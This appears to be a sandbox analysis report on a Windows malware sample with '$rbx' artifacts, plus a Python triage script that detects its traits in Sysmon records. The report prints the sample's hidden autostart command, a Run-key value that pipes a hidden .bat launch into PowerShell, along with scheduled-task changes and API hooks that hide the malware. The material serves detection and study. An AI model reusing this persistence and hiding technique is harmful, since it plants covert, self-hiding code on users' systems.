Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx,17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3EA7DD push rcx; retf 003Fh17_3_00000253FC3EA7DE
Source: C:\Windows\System32\conhost.exeCode function: 18_3_000002A5AF34A7DD push rcx; retf 003Fh18_3_000002A5AF34A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E00BD pushad ; iretd 36_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E63D1 push ebx; retf 0009h36_2_00007FFD343E642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EB05C push esp; retf 36_2_00007FFD343EB05D
Source: C:\Windows\System32\conhost.exeCode function: 37_3_000001780D3FA7DD push rcx; retf 003Fh37_3_000001780D3FA7DE
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000020175E9A7DD push rcx; retf 003Fh38_3_0000020175E9A7DE
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_000002D01659A7DD push rcx; retf 003Fh39_3_000002D01659A7DE

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
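The Boot Survival entries show the whole persistence chain: a HKCU Run value named `$rbx-XVR` whose data is `cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden` (the command reaches powershell.exe on stdin through the echo pipe, so powershell itself is launched with no script path and no -Command, exactly as the `powershell.exe -WindowStyle Hidden` process-creation rows above show), a scheduled task deleted by name (`$rbx-CNT1`) and a new task definition `$rbx-FHOIapsb` written under System32\Tasks by the Schedule service (svchost.exe). The Python below is an added example, not part of the report: it scores constructed Sysmon-style records (Event 13 registry value set, Event 1 process create, Event 11 file create; the field names are Sysmon's, the SID and record contents are invented to mirror the rows above) for each of those traits.

```python
import re

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
ECHO_PIPE = re.compile(r"\becho\b.*\|\s*powershell(\.exe)?\b", re.I)
WINDOWS_BAT = re.compile(r"C:\\Windows\\[^\s'\"]*\.bat\b", re.I)
SCHTASKS = re.compile(r"schtasks(\.exe)?\"?\s+.*?/(delete|create|change)\b.*?/tn\s+\"?([^\"\s]+)", re.I)
BARE_HIDDEN_PS = re.compile(r"^\"?(?:[A-Z]:\\[^\"]*\\)?powershell(\.exe)?\"?\s+-windowstyle\s+hidden\s*$", re.I)
TASK_FILE = re.compile(r"C:\\Windows\\System32\\Tasks\\\$", re.I)


def score_run_value(target_object: str, details: str) -> list:
    """Reasons a Run-key value looks like this loader's autostart entry."""
    reasons = []
    if not RUN_KEY.search(target_object):
        return reasons
    name = target_object.rsplit("\\", 1)[-1]
    if name.startswith("$"):
        reasons.append("value name starts with '$'")
    if ECHO_PIPE.search(details):
        reasons.append("echo piped into powershell: command delivered on stdin")
    if "-windowstyle hidden" in details.lower():
        reasons.append("-WindowStyle Hidden")
    if WINDOWS_BAT.search(details):
        reasons.append(".bat launched from under C:\\Windows")
    return reasons


def triage(events) -> list:
    """Return (event_id, summary, reasons) for every record that matches."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13:   # RegistryEvent (Value Set)
            reasons = score_run_value(ev.get("TargetObject", ""), ev.get("Details", ""))
            if reasons:
                hits.append((13, ev["TargetObject"], reasons))
        elif eid == 1:  # Process Create
            cl = ev.get("CommandLine", "")
            m = SCHTASKS.search(cl)
            if m and m.group(3).startswith("$"):
                hits.append((1, cl, ["schtasks /%s on task named '%s'" % (m.group(2).lower(), m.group(3))]))
            elif BARE_HIDDEN_PS.match(cl) and "echo" in ev.get("ParentCommandLine", "").lower():
                hits.append((1, cl, ["powershell.exe with no script or -Command; input comes from the parent's echo pipe"]))
        elif eid == 11:  # FileCreate
            fn = ev.get("TargetFilename", "")
            if TASK_FILE.match(fn):
                hits.append((11, fn, ["scheduled-task definition whose name starts with '$'"]))
    return hits


# Constructed records mirroring the report's rows (SID and benign entry invented).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR",
     "Details": r"cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden",
     "ParentCommandLine": r"cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\System32\Tasks\$rbx-FHOIapsb"},
]

if __name__ == "__main__":
    for eid, what, reasons in triage(SAMPLE_EVENTS):
        print(eid, what, "->", "; ".join(reasons))
```

The stdin delivery is the detail worth a dedicated rule: command-line logging of the powershell.exe process shows only `-WindowStyle Hidden`, so the actual command is visible only in the parent cmd.exe command line or in PowerShell script-block logging.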

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (95 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries, each followed by a NOOPENFILEERRORBOX entry)
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX (7 identical entries)
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
